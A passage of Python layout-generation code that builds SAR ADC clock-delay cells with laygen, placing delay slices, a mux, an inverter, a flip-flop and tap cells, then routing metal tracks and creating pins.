                                       pdict[imux0.name]['EN0'][0], y0+1, rg_m3m4)
    #route-input: the input fans out to the mux I0 and the delay chain head
    rv0, rin0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[imux0.name]['I0'][0],
                                np.array([x0, y0+2]), rg_m3m4)
    rv0, rin1 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv11.name]['I'][0],
                                np.array([x0, y0+2]), rg_m3m4)
    #route-path1: inv11 -> inv12 -> inv13 -> inv14 -> mux input I1 (delayed branch)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv11.name]['O'][0],
                                       pdict[iinv12.name]['I'][0], y0+3, rg_m3m4)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv12.name]['O'][0],
                                       pdict[iinv13.name]['I'][0], y0+5, rg_m3m4)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv13.name]['O'][0],
                                       pdict[iinv14.name]['I'][0], y0+3, rg_m3m4)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv14.name]['O'][0],
                                       pdict[imux0.name]['I1'][0], y0+5, rg_m3m4)
    #route-output
    #rv0, rout0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[imux0.name]['O'][0],
    #                             np.array([x1, y0+2]), rg_m3m4)
    #pins: O is pinned directly on the mux output here (not a boundary pin)
    laygen.create_boundary_pin_form_rect(rin0, rg_m3m4, "I", laygen.layers['pin'][4], size=6, direction='left')
    laygen.create_boundary_pin_form_rect(rsel0, rg_m3m4, "SEL", laygen.layers['pin'][4], size=6, direction='left')
    laygen.pin(name='O', layer=laygen.layers['pin'][3], xy=pdict[imux0.name]['O'], gridname=rg_m3m4)
    # power pin
    # NOTE(review): rg_m1m2 is not defined in this function; presumably a
    # module-level grid-name global defined elsewhere in this file — confirm.
    create_power_pin_from_inst(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, inst_left=isel0, inst_right=imux0)
def generate_sarclkdelay(laygen, objectname_pfix, templib_logic, workinglib, placement_grid, routing_grid_m3m4,
m_space_4x=0, m_space_2x=0, m_space_1x=0, origin=np.array([0, 0])):
"""generate clock delay """
pg = placement_grid
rg_m3m4 = routing_grid_m3m4
tap_name = 'tap'
slice_name = 'sarclkdelayslice'
space_1x_name = 'space_1x'
space_2x_name = 'space_2x'
space_4x_name = 'space_4x'
# placement
itapl = laygen.place(name = "I" + objectname_pfix + 'TAPL0', templatename = tap_name,
gridname = pg, xy=origin, template_libname = templib_logic)
islice3 = laygen.relplace(name="I" + objectname_pfix + 'SL3', templatename=slice_name,
gridname=pg, refinstname=itapl.name, template_libname=workinglib, transform='MY')
islice2 = laygen.relplace(name="I" + objectname_pfix + 'SL2', templatename=slice_name,
gridname=pg, refinstname=islice3.name, template_libname=workinglib, transform='MY')
islice1 = laygen.relplace(name="I" + objectname_pfix + 'SK1', templatename=slice_name,
gridname=pg, refinstname=islice2.name, template_libname=workinglib, transform='MY')
islice0 = laygen.relplace(name="I" + objectname_pfix + 'SL0', templatename=slice_name,
gridname=pg, refinstname=islice1.name, template_libname=workinglib, transform='MY')
isp4x = []
isp2x = []
isp1x = []
refi=islice0.name
if not m_space_4x==0:
isp4x.append(laygen.relplace(name="I" + objectname_pfix + 'SP4X0', templatename=space_4x_name,
shape = np.array([m_space_4x, 1]), gridname=pg,
refinstname=refi, template_libname=templib_logic))
refi = isp4x[-1].name
if not m_space_2x==0:
isp2x.append(laygen.relplace(name="I" + objectname_pfix + 'SP2X0', templatename=space_2x_name,
shape = np.array([m_space_2x, 1]), gridname=pg,
refinstname=refi, template_libname=templib_logic))
refi = isp2x[-1].name
if not m_space_1x==0:
isp1x.append(laygen.relplace(name="I" + objectname_pfix + 'SP1X0', templatename=space_1x_name,
shape=np.array([m_space_1x, 1]), gridname=pg,
refinstname=refi, template_libname=templib_logic))
refi = isp1x[-1].name
itapr=laygen.relplace(name = "I" + objectname_pfix + 'TAPR0', templatename = tap_name,
gridname = pg, refinstname = refi, template_libname = templib_logic)
# internal pins
pdict = laygen.get_inst_pin_coord(None, None, rg_m3m4)
# internal routes
x0 = laygen.get_inst_xy(name=islice0.name, gridname=rg_m3m4)[0] + 1
x1 = laygen.get_inst_xy(name=islice3.name, gridname=rg_m3m4)[0]\
+laygen.get_template_size(name=islice3.cellname, gridname=rg_m3m4, libname=workinglib)[0] - 1
y0 = pdict[islice0.name]['I'][0][1] + 0
#route-backtoback
laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
refinstname0=islice0.name, refpinname0='O', refinstname1=islice1.name, refpinname1='I')
laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
refinstname0=islice1.name, refpinname0='O', refinstname1=islice2.name, refpinname1='I')
laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
refinstname0=islice2.name, refpinname0='O', refinstname1=islice3.name, refpinname1='I')
#route-sel
rsel0 = laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([x0, y0-2]), gridname0=rg_m3m4,
refinstname0=islice0.name, refpinname0='SEL')
rv0, rsel1 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice1.name]['SEL'][0],
np.array([x0, y0-4]), rg_m3m4)
rv0, rsel2 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice2.name]['SEL'][0],
np.array([x0, y0-5]), rg_m3m4)
rv0, rsel3 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice3.name]['SEL'][0],
np.array([x0, y0-6]), rg_m3m4)
#pins
laygen.pin(name='I', layer=laygen.layers['pin'][4], xy=pdict[islice0.name]['I'], gridname=rg_m3m4)
laygen.create_boundary_pin_form_rect(rsel0, rg_m3m4, "SEL<0>", laygen.layers['pin'][4], size=6, direction='right')
laygen.create_boundary_pin_form_rect(rsel1, rg_m3m4, "SEL<1>", laygen.layers['pin'][4], size=6, direction='right')
laygen.create_boundary_pin_form_rect(rsel2, rg_m3m4, "SEL<2>", laygen.layers['pin'][4], size=6, direction='right')
laygen.create_boundary_pin_form_rect(rsel3, rg_m3m4, "SEL<3>", laygen.layers['pin'][4], size=6, direction='right')
#[rh0, rv0, rh1] = laygen.route_hvh(laygen.layers['metal'][4], laygen.layers['metal'][3],
# pdict[islice3.name]['O'][0], np.array([x0, pdict[islice3.name]['O'][1][1]-3]),
# pdict[islice3.name]['O'][1][0], rg_m3m4)
#laygen.create_boundary_pin_form_rect(rh1, rg_m3m4, "O", laygen.layers['pin'][4], size=6, direction='left')
laygen.pin(name='O', layer=laygen.layers['pin'][4], xy=pdict[islice3.name]['O'], gridname=rg_m3m4)
# power pin
#create_power_pin_from_inst(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, inst_left=itapl, inst_right=itapr)
# power pin
pwr_dim=laygen.get_template_size(name=itapl.cellname, gridname=rg_m2m3, libname=itapl.libname)
rvdd = []
rvss = []
rp1='VDD'
for i in range(1, int(pwr_dim[0]/2)):
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i, 0]), xy1=np.array([2*i, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
laygen.pin_from_rect('VDD'+str(2*i-2), laygen.layers['pin'][3], rvdd[-1], gridname=rg_m2m3, netname='VDD')
laygen.pin_from_rect('VSS'+str(2*i-2), laygen.layers['pin'][3], rvss[-1], gridname=rg_m2m3, netname='VSS')
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i, 0]), xy1=np.array([2*i, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
laygen.pin_from_rect('VDD'+str(2*i-1), laygen.layers['pin'][3], rvdd[-1], gridname=rg_m2m3, netname='VDD')
laygen.pin_from_rect('VSS'+str(2*i-1), laygen.layers['pin'][3], rvss[-1], gridname=rg_m2m3, netname='VSS')
for j in range(1, int(pwr_dim[0]/2)):
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j, 0]), xy1=np.array([2*j, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VDD', refinstindex0=np.array([0, 0]), addvia0=True,
refinstname1=itapl.name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j+1, 0]), xy1=np.array([2*j+1, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VDD', refinstindex0=np.array([0, 0]),
refinstname1=itapl.name, refpinname1='VSS', refinstindex1=np.array([0, 0]), addvia1=True))
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j+1, 0]), xy1=np.array([2*j+1, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VDD', refinstindex0=np.array([0, 0]), addvia0=True,
refinstname1=itapr.name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j, 0]), xy1=np.array([2*j, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VDD', refinstindex0=np.array([0, 0]),
refinstname1=itapr.name, refpinname1='VSS', refinstindex1=np.array([0, 0]), addvia1=True))
def generate_sarclkdelay_compact(laygen, objectname_pfix, templib_logic, workinglib, placement_grid, routing_grid_m3m4,
                                 m_space_4x=0, m_space_2x=0, m_space_1x=0, origin=np.array([0, 0])):
    """Generate a compact four-slice SAR clock-delay cell.

    Layout (left to right): tap | SL3 | SL2 | SL1 | SL0 | fillers | tap,
    with every slice mirrored ('MY').  The slices are chained
    SL0.O -> SL1.I, SL1.O -> SL2.I, SL2.O -> SL3.I, each slice's SEL input
    is brought out to the right edge as SEL<3:0>, and I (input of SL0),
    O (output of SL3) and the VDD/VSS straps over the taps are exported
    as pins.

    Parameters
    ----------
    laygen : GridLayoutGenerator
        Generator instance; the currently selected cell is populated.
    objectname_pfix : str
        Prefix prepended to every instance name created here.
    templib_logic : str
        Template library holding the tap and space_* cells.
    workinglib : str
        Library holding the 'sarclkdelayslice_compact' template.
    placement_grid : str
        Placement grid name.
    routing_grid_m3m4 : str
        M3/M4 routing grid name.
    m_space_4x, m_space_2x, m_space_1x : int, optional
        Number of 4x/2x/1x filler cells inserted before the right tap.
    origin : numpy.ndarray, optional
        Placement origin of the left tap.

    Notes
    -----
    ``rg_m2m3`` used by the power-strap section is a module-level grid name
    (defined in the ``__main__`` section of this script).
    """
    pg = placement_grid
    rg_m3m4 = routing_grid_m3m4
    tap_name = 'tap'
    slice_name = 'sarclkdelayslice_compact'
    space_1x_name = 'space_1x'
    space_2x_name = 'space_2x'
    space_4x_name = 'space_4x'
    # placement: left tap, then the four mirrored delay slices
    itapl = laygen.place(name = "I" + objectname_pfix + 'TAPL0', templatename = tap_name,
                         gridname = pg, xy=origin, template_libname = templib_logic)
    islice3 = laygen.relplace(name="I" + objectname_pfix + 'SL3', templatename=slice_name,
                              gridname=pg, refinstname=itapl.name, template_libname=workinglib, transform='MY')
    islice2 = laygen.relplace(name="I" + objectname_pfix + 'SL2', templatename=slice_name,
                              gridname=pg, refinstname=islice3.name, template_libname=workinglib, transform='MY')
    # bugfix: instance was named 'SK1' (typo); renamed to 'SL1' for consistency
    # with the SL3/SL2/SL0 siblings.
    islice1 = laygen.relplace(name="I" + objectname_pfix + 'SL1', templatename=slice_name,
                              gridname=pg, refinstname=islice2.name, template_libname=workinglib, transform='MY')
    islice0 = laygen.relplace(name="I" + objectname_pfix + 'SL0', templatename=slice_name,
                              gridname=pg, refinstname=islice1.name, template_libname=workinglib, transform='MY')
    # filler cells pad the row out to the target width
    isp4x = []
    isp2x = []
    isp1x = []
    refi = islice0.name
    if m_space_4x != 0:
        isp4x.append(laygen.relplace(name="I" + objectname_pfix + 'SP4X0', templatename=space_4x_name,
                                     shape=np.array([m_space_4x, 1]), gridname=pg,
                                     refinstname=refi, template_libname=templib_logic))
        refi = isp4x[-1].name
    if m_space_2x != 0:
        isp2x.append(laygen.relplace(name="I" + objectname_pfix + 'SP2X0', templatename=space_2x_name,
                                     shape=np.array([m_space_2x, 1]), gridname=pg,
                                     refinstname=refi, template_libname=templib_logic))
        refi = isp2x[-1].name
    if m_space_1x != 0:
        isp1x.append(laygen.relplace(name="I" + objectname_pfix + 'SP1X0', templatename=space_1x_name,
                                     shape=np.array([m_space_1x, 1]), gridname=pg,
                                     refinstname=refi, template_libname=templib_logic))
        refi = isp1x[-1].name
    itapr = laygen.relplace(name = "I" + objectname_pfix + 'TAPR0', templatename = tap_name,
                            gridname = pg, refinstname = refi, template_libname = templib_logic)
    # internal pins
    pdict = laygen.get_inst_pin_coord(None, None, rg_m3m4)
    # internal routes
    # x0: one track right of slice0; y0: track of slice0's I pin
    # (an unused right-edge coordinate x1 was computed here; removed as dead code)
    x0 = laygen.get_inst_xy(name=islice0.name, gridname=rg_m3m4)[0] + 1
    y0 = pdict[islice0.name]['I'][0][1] + 0
    # route: chain the slices back to back on M4 (O of one slice to I of the next)
    laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
                 refinstname0=islice0.name, refpinname0='O', refinstname1=islice1.name, refpinname1='I')
    laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
                 refinstname0=islice1.name, refpinname0='O', refinstname1=islice2.name, refpinname1='I')
    laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
                 refinstname0=islice2.name, refpinname0='O', refinstname1=islice3.name, refpinname1='I')
    # route: each slice's SEL brought out to x0 (M3 stub up to an M4 horizontal)
    rsel0 = laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([x0, y0-2]), gridname0=rg_m3m4,
                         refinstname0=islice0.name, refpinname0='SEL')
    rv0, rsel1 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice1.name]['SEL'][0],
                                 np.array([x0, y0-4]), rg_m3m4)
    rv0, rsel2 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice2.name]['SEL'][0],
                                 np.array([x0, y0-5]), rg_m3m4)
    rv0, rsel3 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice3.name]['SEL'][0],
                                 np.array([x0, y0-6]), rg_m3m4)
    # pins
    laygen.pin(name='I', layer=laygen.layers['pin'][4], xy=pdict[islice0.name]['I'], gridname=rg_m3m4)
    laygen.create_boundary_pin_form_rect(rsel0, rg_m3m4, "SEL<0>", laygen.layers['pin'][4], size=6, direction='right')
    laygen.create_boundary_pin_form_rect(rsel1, rg_m3m4, "SEL<1>", laygen.layers['pin'][4], size=6, direction='right')
    laygen.create_boundary_pin_form_rect(rsel2, rg_m3m4, "SEL<2>", laygen.layers['pin'][4], size=6, direction='right')
    laygen.create_boundary_pin_form_rect(rsel3, rg_m3m4, "SEL<3>", laygen.layers['pin'][4], size=6, direction='right')
    laygen.pin(name='O', layer=laygen.layers['pin'][4], xy=pdict[islice3.name]['O'], gridname=rg_m3m4)
    # power pins: vertical M3 straps over each tap, alternating VDD/VSS columns.
    # The i-loop draws the straps and exports pins; the j-loop repeats the
    # columns with addvia0/addvia1 to drop vias onto the VDD/VSS rails.
    pwr_dim = laygen.get_template_size(name=itapl.cellname, gridname=rg_m2m3, libname=itapl.libname)
    rvdd = []
    rvss = []
    rp1 = 'VDD'
    for i in range(1, int(pwr_dim[0]/2)):
        rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i, 0]), xy1=np.array([2*i, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapl.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
                                 refinstname1=itapl.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
        rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapl.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
                                 refinstname1=itapl.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
        laygen.pin_from_rect('VDD'+str(2*i-2), laygen.layers['pin'][3], rvdd[-1], gridname=rg_m2m3, netname='VDD')
        laygen.pin_from_rect('VSS'+str(2*i-2), laygen.layers['pin'][3], rvss[-1], gridname=rg_m2m3, netname='VSS')
        rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapr.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
                                 refinstname1=itapr.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
        rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i, 0]), xy1=np.array([2*i, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapr.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
                                 refinstname1=itapr.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
        laygen.pin_from_rect('VDD'+str(2*i-1), laygen.layers['pin'][3], rvdd[-1], gridname=rg_m2m3, netname='VDD')
        laygen.pin_from_rect('VSS'+str(2*i-1), laygen.layers['pin'][3], rvss[-1], gridname=rg_m2m3, netname='VSS')
    for j in range(1, int(pwr_dim[0]/2)):
        rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j, 0]), xy1=np.array([2*j, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapl.name, refpinname0='VDD', refinstindex0=np.array([0, 0]), addvia0=True,
                                 refinstname1=itapl.name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
        rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j+1, 0]), xy1=np.array([2*j+1, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapl.name, refpinname0='VDD', refinstindex0=np.array([0, 0]),
                                 refinstname1=itapl.name, refpinname1='VSS', refinstindex1=np.array([0, 0]), addvia1=True))
        rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j+1, 0]), xy1=np.array([2*j+1, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapr.name, refpinname0='VDD', refinstindex0=np.array([0, 0]), addvia0=True,
                                 refinstname1=itapr.name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
        rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j, 0]), xy1=np.array([2*j, 0]), gridname0=rg_m2m3,
                                 refinstname0=itapr.name, refpinname0='VDD', refinstindex0=np.array([0, 0]),
                                 refinstname1=itapr.name, refpinname1='VSS', refinstindex1=np.array([0, 0]), addvia1=True))
def generate_sarclkdelay_compact_dual(laygen, objectname_pfix, templib_logic, workinglib, placement_grid, routing_grid_m3m4,
                                      m_space_4x=0, m_space_2x=0, m_space_1x=0, origin=np.array([0, 0])):
    """Generate the dual-path compact SAR clock-delay cell.

    Places two delay paths (each a 1x slice feeding a 2x slice: SL00->SL01 and
    SL10->SL11), a front section of mux/inverter/DFF/tie cells that selects
    between the two path outputs, and tap cells at both ends, padded with
    filler cells.  Routes the chains, the SEL controls, the DFF-based select
    logic and the power straps, and exports I, SEL0<1:0>, SEL1<1:0>, RST, SB,
    O and the VDD/VSS pins.

    Parameters mirror generate_sarclkdelay_compact: laygen is the
    GridLayoutGenerator, objectname_pfix prefixes instance names,
    templib_logic/workinglib hold the logic and slice templates,
    placement_grid/routing_grid_m3m4 are grid names, m_space_* are the
    4x/2x/1x filler counts, and origin is the left tap's placement origin.

    Note: ``rg_m2m3`` used by the power section is a module-level grid name.
    """
    pg = placement_grid
    rg_m3m4 = routing_grid_m3m4
    # template names (logic library cells + working-library delay slices)
    tap_name = 'tap'
    tie_name = 'tie_2x'
    dff_name = 'dff_rsth_1x'
    inv_name = 'inv_1x'
    mux_name = 'mux2to1_1x'
    slice_name = 'sarclkdelayslice_compact'
    slice_2x_name = 'sarclkdelayslice_compact_2x'
    space_1x_name = 'space_1x'
    space_2x_name = 'space_2x'
    space_4x_name = 'space_4x'
    # placement: tap | mux | inv | dff | tie | SL11 | SL10 | SL01 | SL00 | fillers | tap,
    # all non-tap cells mirrored ('MY')
    itapl = laygen.place(name = "I" + objectname_pfix + 'TAPL0', templatename = tap_name,
                         gridname = pg, xy=origin, template_libname = templib_logic)
    imux0 = laygen.relplace(name="I" + objectname_pfix + 'MUX0', templatename=mux_name,
                            gridname=pg, refinstname=itapl.name, template_libname=templib_logic, transform='MY')
    iinv0 = laygen.relplace(name="I" + objectname_pfix + 'INV0', templatename=inv_name,
                            gridname=pg, refinstname=imux0.name, template_libname=templib_logic, transform='MY')
    idff0 = laygen.relplace(name="I" + objectname_pfix + 'DFF0', templatename=dff_name,
                            gridname=pg, refinstname=iinv0.name, template_libname=templib_logic, transform='MY')
    itie0 = laygen.relplace(name="I" + objectname_pfix + 'TIE0', templatename=tie_name,
                            gridname=pg, refinstname=idff0.name, template_libname=templib_logic, transform='MY')
    islice11 = laygen.relplace(name="I" + objectname_pfix + 'SL11', templatename=slice_2x_name,
                               gridname=pg, refinstname=itie0.name, template_libname=workinglib, transform='MY')
    islice10 = laygen.relplace(name="I" + objectname_pfix + 'SL10', templatename=slice_name,
                               gridname=pg, refinstname=islice11.name, template_libname=workinglib, transform='MY')
    islice01 = laygen.relplace(name="I" + objectname_pfix + 'SL01', templatename=slice_2x_name,
                               gridname=pg, refinstname=islice10.name, template_libname=workinglib, transform='MY')
    islice00 = laygen.relplace(name="I" + objectname_pfix + 'SL00', templatename=slice_name,
                               gridname=pg, refinstname=islice01.name, template_libname=workinglib, transform='MY')
    # filler cells between the last slice and the right tap
    isp4x = []
    isp2x = []
    isp1x = []
    refi=islice00.name
    if not m_space_4x==0:
        isp4x.append(laygen.relplace(name="I" + objectname_pfix + 'SP4X0', templatename=space_4x_name,
                                     shape = np.array([m_space_4x, 1]), gridname=pg,
                                     refinstname=refi, template_libname=templib_logic))
        refi = isp4x[-1].name
    if not m_space_2x==0:
        isp2x.append(laygen.relplace(name="I" + objectname_pfix + 'SP2X0', templatename=space_2x_name,
                                     shape = np.array([m_space_2x, 1]), gridname=pg,
                                     refinstname=refi, template_libname=templib_logic))
        refi = isp2x[-1].name
    if not m_space_1x==0:
        isp1x.append(laygen.relplace(name="I" + objectname_pfix + 'SP1X0', templatename=space_1x_name,
                                     shape=np.array([m_space_1x, 1]), gridname=pg,
                                     refinstname=refi, template_libname=templib_logic))
        refi = isp1x[-1].name
    itapr=laygen.relplace(name = "I" + objectname_pfix + 'TAPR0', templatename = tap_name,
                          gridname = pg, refinstname = refi, template_libname = templib_logic)
    # internal pins
    pdict = laygen.get_inst_pin_coord(None, None, rg_m3m4)
    # internal routes
    # x0: one track right of slice00; x1: near the mux (front/left) edge
    x0 = laygen.get_inst_xy(name=islice00.name, gridname=rg_m3m4)[0] + 1
    x1 = laygen.get_inst_xy(name=imux0.name, gridname=rg_m3m4)[0]\
         -laygen.get_template_size(name=imux0.cellname, gridname=rg_m3m4, libname=templib_logic)[0] - 1 + 2
    #x1 = laygen.get_inst_xy(name=islice11.name, gridname=rg_m3m4)[0]\
    #    +laygen.get_template_size(name=islice11.cellname, gridname=rg_m3m4, libname=workinglib)[0] - 1
    y0 = pdict[islice00.name]['I'][0][1] + 2
    #route-backtoback
    # chain each path's 1x slice into its 2x slice: SL00.O->SL01.I, SL10.O->SL11.I
    laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
                 refinstname0=islice00.name, refpinname0='O', refinstname1=islice01.name, refpinname1='I')
    laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
                 refinstname0=islice10.name, refpinname0='O', refinstname1=islice11.name, refpinname1='I')
    #route-sel
    # bring each slice's SEL input out to x0 (M3 stub + M4 horizontal)
    rv0, rsel00 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice00.name]['SEL'][0],
                                  np.array([x0, y0-2]), rg_m3m4)
    rv0, rsel01 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice01.name]['SEL'][0],
                                  np.array([x0, y0+2]), rg_m3m4)
    rv0, rsel10 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice10.name]['SEL'][0],
                                  np.array([x0, y0-4]), rg_m3m4)
    rv0, rsel11 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice11.name]['SEL'][0],
                                  np.array([x0, y0-5]), rg_m3m4)
    #route-tie
    # tie cell's VSS output drives the DFF data input
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[itie0.name]['TIEVSS'][0],
                                       pdict[idff0.name]['I'][0], y0-2, rg_m3m4)
    #route-en1
    # DFF output drives both the inverter input and the mux EN1 select
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv0.name]['I'][0],
                                       pdict[idff0.name]['O'][0], y0-5, rg_m3m4)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[imux0.name]['EN1'][0],
                                       pdict[idff0.name]['O'][0], y0-5, rg_m3m4)
    #route-en0
    # inverter output drives the complementary mux select EN0
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv0.name]['O'][0],
                                       pdict[imux0.name]['EN0'][0], y0-3, rg_m3m4)
    #route-o0
    # path-0 output (SL01.O) to mux input I0
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice01.name]['O'][0],
                                       pdict[imux0.name]['I0'][0], y0+2, rg_m3m4)
    #route-o1
    # path-1 output (SL11.O) to mux input I1
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice11.name]['O'][0],
                                       pdict[imux0.name]['I1'][0], y0+1, rg_m3m4)
    #route-rst
    rv0, rrst0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[idff0.name]['RST'][0],
                                 np.array([x1, y0+3]), rg_m3m4)
    #route-sb
    # SB is wired to the DFF clock input
    rv0, rsb0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[idff0.name]['CLK'][0],
                                np.array([x1, y0+4-4]), rg_m3m4)
    #route-out
    rv0, ro0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[imux0.name]['O'][0],
                               np.array([x1, y0-2]), rg_m3m4)
    #route-input
    # the input feeds both paths' first slices (SL00 and SL10)
    rv0, ri0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice00.name]['I'][0],
                               np.array([x0, y0-3]), rg_m3m4)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice00.name]['I'][0],
                                       pdict[islice10.name]['I'][0], y0-3, rg_m3m4)
    #pins
    #laygen.pin(name='I', layer=laygen.layers['pin'][4], xy=pdict[islice00.name]['I'], gridname=rg_m3m4)
    laygen.create_boundary_pin_form_rect(ri0, rg_m3m4, "I", laygen.layers['pin'][4], size=6, direction='right')
    laygen.create_boundary_pin_form_rect(rsel00, rg_m3m4, "SEL0<0>", laygen.layers['pin'][4], size=6, direction='right')
    laygen.create_boundary_pin_form_rect(rsel01, rg_m3m4, "SEL0<1>", laygen.layers['pin'][4], size=6, direction='right')
    laygen.create_boundary_pin_form_rect(rsel10, rg_m3m4, "SEL1<0>", laygen.layers['pin'][4], size=6, direction='right')
    laygen.create_boundary_pin_form_rect(rsel11, rg_m3m4, "SEL1<1>", laygen.layers['pin'][4], size=6, direction='right')
    laygen.create_boundary_pin_form_rect(rrst0, rg_m3m4, "RST", laygen.layers['pin'][4], size=6, direction='left')
    laygen.create_boundary_pin_form_rect(rsb0, rg_m3m4, "SB", laygen.layers['pin'][4], size=6, direction='left')
    laygen.create_boundary_pin_form_rect(ro0, rg_m3m4, "O", laygen.layers['pin'][4], size=6, direction='left')
    # power pin
